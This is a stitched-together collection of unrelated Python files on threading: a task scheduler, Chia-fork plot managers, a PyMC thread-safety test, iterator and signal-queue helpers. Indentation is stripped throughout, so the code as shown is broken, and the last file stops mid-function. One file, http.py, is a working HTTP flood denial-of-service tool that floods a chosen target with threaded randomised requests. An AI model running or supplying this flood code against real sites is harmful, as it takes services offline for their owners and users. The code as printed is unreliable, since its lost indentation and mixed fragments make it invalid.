class ThreadedIntervalTask(ThreadedTaskMixin, IntervalTask):
"""Interval Task that executes in its own thread."""
pass
class ThreadedSingleTask(ThreadedTaskMixin, SingleTask):
"""Single Task that executes in its own thread."""
pass
class ThreadedWeekdayTask(ThreadedTaskMixin, WeekdayTask):
"""Weekday Task that executes in its own thread."""
pass
class ThreadedMonthdayTask(ThreadedTaskMixin, MonthdayTask):
"""Monthday Task that executes in its own thread."""
pass
except ImportError:
# threading is not available
pass
if hasattr(os, "fork"):
import signal
class ForkedScheduler(Scheduler):
"""A Scheduler that runs in its own forked process."""
def __del__(self):
if hasattr(self, "childpid"):
os.kill(self.childpid, signal.SIGKILL)
def start(self):
"""Fork off a new process in which the scheduler will run."""
pid = os.fork()
if pid == 0:
# we are the child
signal.signal(signal.SIGUSR1, self.signalhandler)
self._run()
os._exit(0)
else:
# we are the parent
self.childpid = pid
# can no longer insert in the scheduler queue
del self.sched
def stop(self):
"""Stop the scheduler and wait for the process to finish."""
os.kill(self.childpid, signal.SIGUSR1)
os.waitpid(self.childpid, 0)
def signalhandler(self, sig, stack):
Scheduler.stop(self)
class ForkedTaskMixin:
"""A mixin class to make a Task execute in a separate process."""
def __call__(self, schedulerref):
"""Execute the task action in its own process."""
pid = os.fork()
if pid == 0:
# we are the child
try:
self.execute()
except Exception as x:
    self.handle_exception(x)
os._exit(0)
else:
# we are the parent
self.reschedule(schedulerref())
class ForkedIntervalTask(ForkedTaskMixin, IntervalTask):
"""Interval Task that executes in its own process."""
pass
class ForkedSingleTask(ForkedTaskMixin, SingleTask):
"""Single Task that executes in its own process."""
pass
class ForkedWeekdayTask(ForkedTaskMixin, WeekdayTask):
"""Weekday Task that executes in its own process."""
pass
class ForkedMonthdayTask(ForkedTaskMixin, MonthdayTask):
"""Monthday Task that executes in its own process."""
pass
if __name__ == "__main__":
def testaction(arg):
    print(">>>TASK", arg, "sleeping 3 seconds")
    time.sleep(3)
    print("<<<END_TASK", arg)
s = ThreadedScheduler()
s.add_interval_task(testaction,
"test action 1",
0,
4,
method.threaded,
["task 1"],
None)
s.start()
print "Scheduler started, waiting 15 sec...."
time.sleep(15)
print "STOP SCHEDULER"
s.stop()
print "EXITING"
|
manager.py
|
import logging
import threading
import time
import traceback
from concurrent.futures.thread import ThreadPoolExecutor
from dataclasses import dataclass
from pathlib import Path
from typing import Any, Callable, Dict, Iterator, List, Optional, Set, Tuple
from blspy import G1Element
from chiapos import DiskProver
from silicoin.consensus.pos_quality import UI_ACTUAL_SPACE_CONSTANT_FACTOR, _expected_plot_size
from silicoin.plotting.util import (
PlotInfo,
PlotRefreshEvents,
PlotRefreshResult,
PlotsRefreshParameter,
get_plot_filenames,
parse_plot_info,
stream_plot_info_ph,
stream_plot_info_pk,
)
from silicoin.types.blockchain_format.proof_of_space import ProofOfSpace
from silicoin.types.blockchain_format.sized_bytes import bytes32
from silicoin.util.ints import uint16
from silicoin.util.path import mkdir
from silicoin.util.streamable import Streamable, streamable
from silicoin.wallet.derive_keys import master_sk_to_local_sk
log = logging.getLogger(__name__)
CURRENT_VERSION: uint16 = uint16(0)
@dataclass(frozen=True)
@streamable
class CacheEntry(Streamable):
pool_public_key: Optional[G1Element]
pool_contract_puzzle_hash: Optional[bytes32]
plot_public_key: G1Element
farmer_public_key: G1Element
@dataclass(frozen=True)
@streamable
class DiskCache(Streamable):
version: uint16
data: List[Tuple[bytes32, CacheEntry]]
class Cache:
_changed: bool
_data: Dict[bytes32, CacheEntry]
def __init__(self, path: Path):
self._changed = False
self._data = {}
self._path = path
if not path.parent.exists():
mkdir(path.parent)
def __len__(self):
return len(self._data)
def update(self, plot_id: bytes32, entry: CacheEntry):
self._data[plot_id] = entry
self._changed = True
def remove(self, cache_keys: List[bytes32]):
for key in cache_keys:
if key in self._data:
del self._data[key]
self._changed = True
def save(self):
try:
disk_cache: DiskCache = DiskCache(
CURRENT_VERSION, [(plot_id, cache_entry) for plot_id, cache_entry in self.items()]
)
serialized: bytes = bytes(disk_cache)
self._path.write_bytes(serialized)
self._changed = False
log.info(f"Saved {len(serialized)} bytes of cached data")
except Exception as e:
log.error(f"Failed to save cache: {e}, {traceback.format_exc()}")
def load(self):
try:
serialized = self._path.read_bytes()
log.info(f"Loaded {len(serialized)} bytes of cached data")
stored_cache: DiskCache = DiskCache.from_bytes(serialized)
if stored_cache.version != CURRENT_VERSION:
# TODO, Migrate or drop current cache if the version changes.
raise ValueError(f"Invalid cache version {stored_cache.version}. Expected version {CURRENT_VERSION}.")
self._data = {plot_id: cache_entry for plot_id, cache_entry in stored_cache.data}
except FileNotFoundError:
log.debug(f"Cache {self._path} not found")
except Exception as e:
log.error(f"Failed to load cache: {e}, {traceback.format_exc()}")
def keys(self):
return self._data.keys()
def items(self):
return self._data.items()
def get(self, plot_id):
return self._data.get(plot_id)
def changed(self):
return self._changed
def path(self):
return self._path
class PlotManager:
plots: Dict[Path, PlotInfo]
plot_filename_paths: Dict[str, Tuple[str, Set[str]]]
plot_filename_paths_lock: threading.Lock
failed_to_open_filenames: Dict[Path, int]
no_key_filenames: Set[Path]
farmer_public_keys: List[G1Element]
pool_public_keys: List[G1Element]
cache: Cache
match_str: Optional[str]
show_memo: bool
open_no_key_filenames: bool
last_refresh_time: float
refresh_parameter: PlotsRefreshParameter
log: Any
_lock: threading.Lock
_refresh_thread: Optional[threading.Thread]
_refreshing_enabled: bool
_refresh_callback: Callable
def __init__(
self,
root_path: Path,
refresh_callback: Callable,
match_str: Optional[str] = None,
show_memo: bool = False,
open_no_key_filenames: bool = False,
refresh_parameter: PlotsRefreshParameter = PlotsRefreshParameter(),
):
self.root_path = root_path
self.plots = {}
self.plot_filename_paths = {}
self.plot_filename_paths_lock = threading.Lock()
self.failed_to_open_filenames = {}
self.no_key_filenames = set()
self.farmer_public_keys = []
self.pool_public_keys = []
self.cache = Cache(self.root_path.resolve() / "cache" / "plot_manager.dat")
self.match_str = match_str
self.show_memo = show_memo
self.open_no_key_filenames = open_no_key_filenames
self.last_refresh_time = 0
self.refresh_parameter = refresh_parameter
self.log = logging.getLogger(__name__)
self._lock = threading.Lock()
self._refresh_thread = None
self._refreshing_enabled = False
self._refresh_callback = refresh_callback # type: ignore
def __enter__(self):
self._lock.acquire()
def __exit__(self, exc_type, exc_value, exc_traceback):
self._lock.release()
def set_refresh_callback(self, callback: Callable):
self._refresh_callback = callback # type: ignore
def set_public_keys(self, farmer_public_keys: List[G1Element], pool_public_keys: List[G1Element]):
self.farmer_public_keys = farmer_public_keys
self.pool_public_keys = pool_public_keys
def public_keys_available(self):
return len(self.farmer_public_keys) and len(self.pool_public_keys)
def plot_count(self):
with self:
return len(self.plots)
def get_duplicates(self):
result = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
_, duplicated_paths = paths_entry
for path in duplicated_paths:
result.append(Path(path) / plot_filename)
return result
def needs_refresh(self) -> bool:
return time.time() - self.last_refresh_time > float(self.refresh_parameter.interval_seconds)
def start_refreshing(self):
self._refreshing_enabled = True
if self._refresh_thread is None or not self._refresh_thread.is_alive():
self.cache.load()
self._refresh_thread = threading.Thread(target=self._refresh_task)
self._refresh_thread.start()
def stop_refreshing(self):
self._refreshing_enabled = False
if self._refresh_thread is not None and self._refresh_thread.is_alive():
self._refresh_thread.join()
self._refresh_thread = None
def trigger_refresh(self):
log.debug("trigger_refresh")
self.last_refresh_time = 0
def _refresh_task(self):
while self._refreshing_enabled:
while not self.needs_refresh() and self._refreshing_enabled:
time.sleep(1)
if not self._refreshing_enabled:
return
plot_filenames: Dict[Path, List[Path]] = get_plot_filenames(self.root_path)
plot_directories: Set[Path] = set(plot_filenames.keys())
plot_paths: List[Path] = []
for paths in plot_filenames.values():
plot_paths += paths
total_result: PlotRefreshResult = PlotRefreshResult()
total_size = len(plot_paths)
self._refresh_callback(PlotRefreshEvents.started, PlotRefreshResult(remaining=total_size))
# First drop all plots we have in plot_filename_paths but which are no longer in the filesystem or set in the config
def plot_removed(test_path: Path):
return not test_path.exists() or test_path.parent not in plot_directories
filenames_to_remove: List[str] = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
loaded_path, duplicated_paths = paths_entry
loaded_plot = Path(loaded_path) / Path(plot_filename)
if plot_removed(loaded_plot):
filenames_to_remove.append(plot_filename)
if loaded_plot in self.plots:
del self.plots[loaded_plot]
total_result.removed += 1
# No need to check the duplicates here since we drop the whole entry
continue
paths_to_remove: List[str] = []
for path in duplicated_paths:
if plot_removed(Path(path) / Path(plot_filename)):
paths_to_remove.append(path)
total_result.removed += 1
for path in paths_to_remove:
duplicated_paths.remove(path)
for filename in filenames_to_remove:
del self.plot_filename_paths[filename]
def batches() -> Iterator[Tuple[int, List[Path]]]:
if total_size > 0:
for batch_start in range(0, total_size, self.refresh_parameter.batch_size):
batch_end = min(batch_start + self.refresh_parameter.batch_size, total_size)
yield total_size - batch_end, plot_paths[batch_start:batch_end]
else:
yield 0, []
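# Illustrative worked example (not part of the original source): with total_size == 25
# and batch_size == 10 the generator above yields
#   (15, plot_paths[0:10]), (5, plot_paths[10:20]), (0, plot_paths[20:25])
# i.e. the first element is how many paths remain after the current batch.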
for remaining, batch in batches():
batch_result: PlotRefreshResult = self.refresh_batch(batch, plot_directories)
if not self._refreshing_enabled:
self.log.debug("refresh_plots: Aborted")
break
# Set the remaining files since `refresh_batch()` doesn't know them but we want to report it
batch_result.remaining = remaining
total_result.loaded += batch_result.loaded
total_result.processed += batch_result.processed
total_result.duration += batch_result.duration
self._refresh_callback(PlotRefreshEvents.batch_processed, batch_result)
if remaining == 0:
break
batch_sleep = self.refresh_parameter.batch_sleep_milliseconds
self.log.debug(f"refresh_plots: Sleep {batch_sleep} milliseconds")
time.sleep(float(batch_sleep) / 1000.0)
if self._refreshing_enabled:
self._refresh_callback(PlotRefreshEvents.done, total_result)
# Cleanup unused cache
available_ids = set([plot_info.prover.get_id() for plot_info in self.plots.values()])
invalid_cache_keys = [plot_id for plot_id in self.cache.keys() if plot_id not in available_ids]
self.cache.remove(invalid_cache_keys)
self.log.debug(f"_refresh_task: cached entries removed: {len(invalid_cache_keys)}")
if self.cache.changed():
self.cache.save()
self.last_refresh_time = time.time()
self.log.debug(
f"_refresh_task: total_result.loaded {total_result.loaded}, "
f"total_result.removed {total_result.removed}, "
f"total_duration {total_result.duration:.2f} seconds"
)
def refresh_batch(self, plot_paths: List[Path], plot_directories: Set[Path]) -> PlotRefreshResult:
start_time: float = time.time()
result: PlotRefreshResult = PlotRefreshResult(processed=len(plot_paths))
counter_lock = threading.Lock()
log.debug(f"refresh_batch: {len(plot_paths)} files in directories {plot_directories}")
if self.match_str is not None:
log.info(f'Only loading plots that contain "{self.match_str}" in the file or directory name')
def process_file(file_path: Path) -> Optional[PlotInfo]:
if not self._refreshing_enabled:
return None
filename_str = str(file_path)
if self.match_str is not None and self.match_str not in filename_str:
return None
if (
file_path in self.failed_to_open_filenames
and (time.time() - self.failed_to_open_filenames[file_path])
< self.refresh_parameter.retry_invalid_seconds
):
# Try once every `refresh_parameter.retry_invalid_seconds` seconds to open the file
return None
if file_path in self.plots:
return self.plots[file_path]
entry: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if entry is not None:
loaded_parent, duplicates = entry
if str(file_path.parent) in duplicates:
log.debug(f"Skip duplicated plot {str(file_path)}")
return None
try:
if not file_path.exists():
return None
prover = DiskProver(str(file_path))
log.debug(f"process_file {str(file_path)}")
expected_size = _expected_plot_size(prover.get_size()) * UI_ACTUAL_SPACE_CONSTANT_FACTOR
stat_info = file_path.stat()
# TODO: consider checking if the file was just written to (which would mean that the file is still
# being copied). A segfault might happen in this edge case.
if prover.get_size() >= 30 and stat_info.st_size < 0.98 * expected_size:
log.warning(
f"Not farming plot {file_path}. Size is {stat_info.st_size / (1024**3)} GiB, but expected"
f" at least: {expected_size / (1024 ** 3)} GiB. We assume the file is being copied."
)
return None
cache_entry = self.cache.get(prover.get_id())
if cache_entry is None:
(
pool_public_key_or_puzzle_hash,
farmer_public_key,
local_master_sk,
) = parse_plot_info(prover.get_memo())
# Only use plots that have the correct keys associated with them
if farmer_public_key not in self.farmer_public_keys:
log.warning(f"Plot {file_path} has a farmer public key that is not in the farmer's pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
pool_public_key: Optional[G1Element] = None
pool_contract_puzzle_hash: Optional[bytes32] = None
if isinstance(pool_public_key_or_puzzle_hash, G1Element):
pool_public_key = pool_public_key_or_puzzle_hash
else:
assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
pool_contract_puzzle_hash = pool_public_key_or_puzzle_hash
if pool_public_key is not None and pool_public_key not in self.pool_public_keys:
log.warning(f"Plot {file_path} has a pool public key that is not in the farmer's pool pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
local_sk = master_sk_to_local_sk(local_master_sk)
plot_public_key: G1Element = ProofOfSpace.generate_plot_public_key(
local_sk.get_g1(), farmer_public_key, pool_contract_puzzle_hash is not None
)
cache_entry = CacheEntry(
pool_public_key, pool_contract_puzzle_hash, plot_public_key, farmer_public_key
)
self.cache.update(prover.get_id(), cache_entry)
with self.plot_filename_paths_lock:
paths: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if paths is None:
paths = (str(Path(prover.get_filename()).parent), set())
self.plot_filename_paths[file_path.name] = paths
else:
paths[1].add(str(Path(prover.get_filename()).parent))
log.warning(f"Have multiple copies of the plot {file_path.name} in {[paths[0], *paths[1]]}.")
return None
new_plot_info: PlotInfo = PlotInfo(
prover,
cache_entry.pool_public_key,
cache_entry.pool_contract_puzzle_hash,
cache_entry.plot_public_key,
stat_info.st_size,
stat_info.st_mtime,
cache_entry.farmer_public_key,
)
with counter_lock:
result.loaded += 1
if file_path in self.failed_to_open_filenames:
del self.failed_to_open_filenames[file_path]
except Exception as e:
tb = traceback.format_exc()
log.error(f"Failed to open file {file_path}. {e} {tb}")
self.failed_to_open_filenames[file_path] = int(time.time())
return None
log.info(f"Found plot {file_path} of size {new_plot_info.prover.get_size()}")
if self.show_memo:
plot_memo: bytes32
if pool_contract_puzzle_hash is None:
plot_memo = stream_plot_info_pk(pool_public_key, farmer_public_key, local_master_sk)
else:
plot_memo = stream_plot_info_ph(pool_contract_puzzle_hash, farmer_public_key, local_master_sk)
plot_memo_str: str = plot_memo.hex()
log.info(f"Memo: {plot_memo_str}")
return new_plot_info
with self, ThreadPoolExecutor() as executor:
plots_refreshed: Dict[Path, PlotInfo] = {}
for new_plot in executor.map(process_file, plot_paths):
if new_plot is not None:
plots_refreshed[Path(new_plot.prover.get_filename())] = new_plot
self.plots.update(plots_refreshed)
result.duration = time.time() - start_time
self.log.debug(
f"refresh_batch: loaded {result.loaded}, "
f"removed {result.removed}, processed {result.processed}, "
f"remaining {result.remaining}, batch_size {self.refresh_parameter.batch_size}, "
f"duration: {result.duration:.2f} seconds"
)
return result
|
demo01.py
|
# Context objects
# threadlocal
# Pass values within a single thread; thread-isolated, so the variable stays thread-safe
import threading
# flask = werkzeug (request handling) + jinja2 (templates) + sqlalchemy (database)
from werkzeug.local import Local
local = threading.local()
local.a = 10
l = Local()
def aa(i):
    # child thread
    #local.a = 20
    l.request = i
    bb()
def bb():
    print(l.request)
    #print("child thread " + str(local.a))
if __name__ == '__main__':
for item in range(10):
t = threading.Thread(target=aa,args=(item,))
t.start()
t.join()  # block the current thread; continue only after t has finished
|
test_modelcontext.py
|
# Copyright 2020 The PyMC Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from pytest import raises
from pymc3 import Model, Normal
from pymc3.distributions.distribution import _DrawValuesContext, _DrawValuesContextBlocker
from pymc3.model import modelcontext
class TestModelContext:
def test_thread_safety(self):
"""Regression test for issue #1552: Thread safety of model context manager
This test creates two threads that attempt to construct two
unrelated models at the same time.
For repeatable testing, the two threads are syncronised such
that thread A enters the context manager first, then B,
then A attempts to declare a variable while B is still in the context manager.
"""
aInCtxt, bInCtxt, aDone = [threading.Event() for _ in range(3)]
modelA = Model()
modelB = Model()
def make_model_a():
with modelA:
aInCtxt.set()
bInCtxt.wait()
Normal("a", 0, 1)
aDone.set()
def make_model_b():
aInCtxt.wait()
with modelB:
bInCtxt.set()
aDone.wait()
Normal("b", 0, 1)
threadA = threading.Thread(target=make_model_a)
threadB = threading.Thread(target=make_model_b)
threadA.start()
threadB.start()
threadA.join()
threadB.join()
# now let's see which model got which variable
# previous to #1555, the variables would be swapped:
# - B enters its model context after A, but before a is declared -> a goes into B
# - A leaves its model context before B attempts to declare b. A's context manager
# takes B from the stack, such that b ends up in model A
assert (
list(modelA.named_vars),
list(modelB.named_vars),
) == (["a"], ["b"])
def test_mixed_contexts():
modelA = Model()
modelB = Model()
with raises((ValueError, TypeError)):
modelcontext(None)
with modelA:
with modelB:
assert Model.get_context() == modelB
assert modelcontext(None) == modelB
dvc = _DrawValuesContext()
with dvc:
assert Model.get_context() == modelB
assert modelcontext(None) == modelB
assert _DrawValuesContext.get_context() == dvc
dvcb = _DrawValuesContextBlocker()
with dvcb:
assert _DrawValuesContext.get_context() == dvcb
assert _DrawValuesContextBlocker.get_context() == dvcb
assert _DrawValuesContext.get_context() == dvc
assert _DrawValuesContextBlocker.get_context() is dvc
assert Model.get_context() == modelB
assert modelcontext(None) == modelB
assert _DrawValuesContext.get_context(error_if_none=False) is None
with raises(TypeError):
_DrawValuesContext.get_context()
assert Model.get_context() == modelB
assert modelcontext(None) == modelB
assert Model.get_context() == modelA
assert modelcontext(None) == modelA
assert Model.get_context(error_if_none=False) is None
with raises(TypeError):
Model.get_context(error_if_none=True)
with raises((ValueError, TypeError)):
modelcontext(None)
|
iterators.py
|
"""Various helpful iterators"""
from queue import Empty, Queue
from threading import Thread
class IteratorWithAggregation:
"""
An iterable over an iterable which also makes an aggregate of the values available asap
It iterates over the iterable in a separate thread.
A use case is a generator which collects information about resources,
which might be relatively fast but still take time. While we are iterating over it,
we could perform other operations on yielded records, but we would also like to have access to
the "summary" object as soon as that iterator completes but while we might still be
iterating over items in the outside loop.
Use case: iterate over remote resource for downloads, and get "Total" size/number as
soon as it becomes known inside the underlying iterator.
TODO: probably could be more elegant etc if implemented via async/coroutines.
Attributes
----------
.total:
Aggregated value as known to the moment. None if nothing was aggregated.
It is a final value if `finished` is True.
.finished: bool
Set to True upon completion of iteration
.exc: BaseException or None
If not None -- the exception which was raised
Example
-------
A very simplistic example; typically (unlike range) the nested iteration would take
some time to produce its items::
it = IteratorWithAggregation(range(3), lambda v, t=0: v+t)
for v in it:
print(it.total, it.finished, v)
sleep(0.02) # doing smth heavy, but we would know .total as soon as it is known
would produce (so 3 is known right away, again since it is just range)
3 True 0
3 True 1
3 True 2
"""
def __init__(self, gen, agg, reraise_immediately=False):
"""
Parameters
----------
gen: iterable
Generator (any iterable works, although a non-lazy one would not make much sense)
to yield from
agg: callable
A callable with two args: new_value[, total=None] which should return adjusted
total. Upon first iteration, no prior `total` is provided
reraise_immediately: bool, optional
If True, it would stop yielding values as soon as it detects that some
exception has occurred (although there might still be values in the queue to be yielded
which were collected before the exception was raised)
"""
self.gen = gen
self.agg = agg
self.reraise_immediately = reraise_immediately
self.total = None
self.finished = None
self._exc = None
def __iter__(self):
self.finished = False
self._exc = None
queue = Queue()
def worker():
"""That is the one which interrogates gen and places total
into queue_total upon completion"""
total = None
try:
for value in self.gen:
queue.put(value)
self.total = total = (
self.agg(value, total) if total is not None else self.agg(value)
)
except BaseException as e:
self._exc = e
finally:
self.finished = True
t = Thread(target=worker)
t.start()
# yield from the queue (.total and .finished could be accessed meanwhile)
while True:
if self.reraise_immediately and self._exc is not None:
break
# race condition HERE between checking self.finished and checking queue.empty()
if self.finished and queue.empty():
break
# in general the queue should not be empty, but it could be, e.g. due to the
# race condition with the check above
try:
yield queue.get(timeout=0.001)
except Empty:
continue
t.join()
if self._exc is not None:
raise self._exc
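# A minimal runnable sketch (not part of the original module), assuming a slow
# generator of record sizes; .total becomes the aggregate while iteration continues:
if __name__ == "__main__":
    import time

    def fake_sizes():
        for size in (10, 20, 30):
            time.sleep(0.01)  # simulate a slow remote listing
            yield size

    it = IteratorWithAggregation(fake_sizes(), lambda value, total=0: total + value)
    for size in it:
        print(size, it.total, it.finished)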
|
scalene_sigqueue.py
|
import queue
import threading
class ScaleneSigQueue:
def __init__(self, process):
self.queue = queue.SimpleQueue()
self.process = process
self.thread = None
self.lock = threading.RLock() # held while processing an item
def put(self, item):
self.queue.put(item)
def get(self):
return self.queue.get()
def start(self):
# We use a daemon thread to defensively avoid hanging if we never join with it
if not self.thread:
self.thread = threading.Thread(target=self.run, daemon=True)
self.thread.start()
def stop(self):
if self.thread:
self.queue.put(None)
# We need to join all threads before a fork() to avoid an inconsistent
# state, locked mutexes, etc.
self.thread.join()
self.thread = None
def run(self):
while True:
item = self.queue.get()
if item is None:  # None is the stop request
break
with self.lock:
self.process(*item)
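# A minimal usage sketch (assumed, not part of the original Scalene source):
if __name__ == "__main__":
    def handle(signum, timestamp):
        print(f"processing signal {signum} recorded at {timestamp}")

    sigq = ScaleneSigQueue(handle)
    sigq.start()
    sigq.put((42, 123.0))  # items are unpacked into the process callback
    sigq.stop()            # enqueues the None sentinel and joins the thread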
|
http.py
|
#!/usr/bin/env python3
# MIT License
#
# Copyright (C) 2020, Entynetproject. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import requests
import random
import time
from threading import Thread
# Import modules for HTTP flood
import tools.randomData as randomData
import tools.ipTools as ipTools
def HTTP_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
if ipTools.isCloudFlare(target):
print("\033[1;33m"+"[!]"+"\033[0m"+" This site is under CloudFlare protection.")
if input("\033[1;77m"+"[?]"+"\033[0m"+" Continue HTTP attack? (y/n): ").strip(" ").lower() != "y":
exit()
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting HTTP attack...")
threads_list = []
# Load one random user agent per thread
user_agents = []
for _ in range(threads):
user_agents.append( randomData.random_useragent() )
# HTTP flood
def http_flood():
global FINISH
while True:
if FINISH:
break
payload = str(random._urandom(random.randint(1, 30)))
headers = {
"X-Requested-With": "XMLHttpRequest",
"Connection": "keep-alive",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"Accept-Encoding": "gzip, deflate, br",
"User-agent": random.choice(user_agents)
}
try:
r = requests.get(target, params = payload)
except Exception as e:
print(e)
time.sleep(2)
else:
print("\033[1;32m"+"[+]"+"\033[0m"+" HTTP packet with size " + str(len(payload)) + " was sent!")
# Start threads
for thread in range(0, threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = http_flood)
t.start()
threads_list.append(t)
# Sleep for the selected number of seconds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;77m"+"[i]"+"\033[0m"+" Attack completed.")
|
manager.py
|
from dataclasses import dataclass
import logging
import threading
import time
import traceback
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Set, Tuple
from concurrent.futures.thread import ThreadPoolExecutor
from blspy import G1Element
from chiapos import DiskProver
from stai.consensus.pos_quality import UI_ACTUAL_SPACE_CONSTANT_FACTOR, _expected_plot_size
from stai.plotting.util import (
PlotInfo,
PlotRefreshResult,
PlotsRefreshParameter,
PlotRefreshEvents,
get_plot_filenames,
parse_plot_info,
)
from stai.util.generator_tools import list_to_batches
from stai.util.ints import uint16
from stai.util.path import mkdir
from stai.util.streamable import Streamable, streamable
from stai.types.blockchain_format.proof_of_space import ProofOfSpace
from stai.types.blockchain_format.sized_bytes import bytes32
from stai.wallet.derive_keys import master_sk_to_local_sk
log = logging.getLogger(__name__)
CURRENT_VERSION: uint16 = uint16(0)
@dataclass(frozen=True)
@streamable
class CacheEntry(Streamable):
pool_public_key: Optional[G1Element]
pool_contract_puzzle_hash: Optional[bytes32]
plot_public_key: G1Element
@dataclass(frozen=True)
@streamable
class DiskCache(Streamable):
version: uint16
data: List[Tuple[bytes32, CacheEntry]]
class Cache:
_changed: bool
_data: Dict[bytes32, CacheEntry]
def __init__(self, path: Path):
self._changed = False
self._data = {}
self._path = path
if not path.parent.exists():
mkdir(path.parent)
def __len__(self):
return len(self._data)
def update(self, plot_id: bytes32, entry: CacheEntry):
self._data[plot_id] = entry
self._changed = True
def remove(self, cache_keys: List[bytes32]):
for key in cache_keys:
if key in self._data:
del self._data[key]
self._changed = True
def save(self):
try:
disk_cache: DiskCache = DiskCache(
CURRENT_VERSION, [(plot_id, cache_entry) for plot_id, cache_entry in self.items()]
)
serialized: bytes = bytes(disk_cache)
self._path.write_bytes(serialized)
self._changed = False
log.info(f"Saved {len(serialized)} bytes of cached data")
except Exception as e:
log.error(f"Failed to save cache: {e}, {traceback.format_exc()}")
def load(self):
try:
serialized = self._path.read_bytes()
log.info(f"Loaded {len(serialized)} bytes of cached data")
stored_cache: DiskCache = DiskCache.from_bytes(serialized)
if stored_cache.version != CURRENT_VERSION:
# TODO, Migrate or drop current cache if the version changes.
raise ValueError(f"Invalid cache version {stored_cache.version}. Expected version {CURRENT_VERSION}.")
self._data = {plot_id: cache_entry for plot_id, cache_entry in stored_cache.data}
except FileNotFoundError:
log.debug(f"Cache {self._path} not found")
except Exception as e:
log.error(f"Failed to load cache: {e}, {traceback.format_exc()}")
def keys(self):
return self._data.keys()
def items(self):
return self._data.items()
def get(self, plot_id):
return self._data.get(plot_id)
def changed(self):
return self._changed
def path(self):
return self._path
class PlotManager:
plots: Dict[Path, PlotInfo]
plot_filename_paths: Dict[str, Tuple[str, Set[str]]]
plot_filename_paths_lock: threading.Lock
failed_to_open_filenames: Dict[Path, int]
no_key_filenames: Set[Path]
farmer_public_keys: List[G1Element]
pool_public_keys: List[G1Element]
cache: Cache
match_str: Optional[str]
open_no_key_filenames: bool
last_refresh_time: float
refresh_parameter: PlotsRefreshParameter
log: Any
_lock: threading.Lock
_refresh_thread: Optional[threading.Thread]
_refreshing_enabled: bool
_refresh_callback: Callable
def __init__(
self,
root_path: Path,
refresh_callback: Callable,
match_str: Optional[str] = None,
open_no_key_filenames: bool = False,
refresh_parameter: PlotsRefreshParameter = PlotsRefreshParameter(),
):
self.root_path = root_path
self.plots = {}
self.plot_filename_paths = {}
self.plot_filename_paths_lock = threading.Lock()
self.failed_to_open_filenames = {}
self.no_key_filenames = set()
self.farmer_public_keys = []
self.pool_public_keys = []
self.cache = Cache(self.root_path.resolve() / "cache" / "plot_manager.dat")
self.match_str = match_str
self.open_no_key_filenames = open_no_key_filenames
self.last_refresh_time = 0
self.refresh_parameter = refresh_parameter
self.log = logging.getLogger(__name__)
self._lock = threading.Lock()
self._refresh_thread = None
self._refreshing_enabled = False
self._refresh_callback = refresh_callback # type: ignore
def __enter__(self):
self._lock.acquire()
def __exit__(self, exc_type, exc_value, exc_traceback):
self._lock.release()
def reset(self):
with self:
self.last_refresh_time = time.time()
self.plots.clear()
self.plot_filename_paths.clear()
self.failed_to_open_filenames.clear()
self.no_key_filenames.clear()
def set_refresh_callback(self, callback: Callable):
self._refresh_callback = callback # type: ignore
def set_public_keys(self, farmer_public_keys: List[G1Element], pool_public_keys: List[G1Element]):
self.farmer_public_keys = farmer_public_keys
self.pool_public_keys = pool_public_keys
def public_keys_available(self):
return len(self.farmer_public_keys) and len(self.pool_public_keys)
def plot_count(self):
with self:
return len(self.plots)
def get_duplicates(self):
result = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
_, duplicated_paths = paths_entry
for path in duplicated_paths:
result.append(Path(path) / plot_filename)
return result
def needs_refresh(self) -> bool:
return time.time() - self.last_refresh_time > float(self.refresh_parameter.interval_seconds)
def start_refreshing(self):
self._refreshing_enabled = True
if self._refresh_thread is None or not self._refresh_thread.is_alive():
self.cache.load()
self._refresh_thread = threading.Thread(target=self._refresh_task)
self._refresh_thread.start()
def stop_refreshing(self):
self._refreshing_enabled = False
if self._refresh_thread is not None and self._refresh_thread.is_alive():
self._refresh_thread.join()
self._refresh_thread = None
def trigger_refresh(self):
log.debug("trigger_refresh")
self.last_refresh_time = 0
def _refresh_task(self):
while self._refreshing_enabled:
try:
while not self.needs_refresh() and self._refreshing_enabled:
time.sleep(1)
if not self._refreshing_enabled:
return
plot_filenames: Dict[Path, List[Path]] = get_plot_filenames(self.root_path)
plot_directories: Set[Path] = set(plot_filenames.keys())
plot_paths: List[Path] = []
for paths in plot_filenames.values():
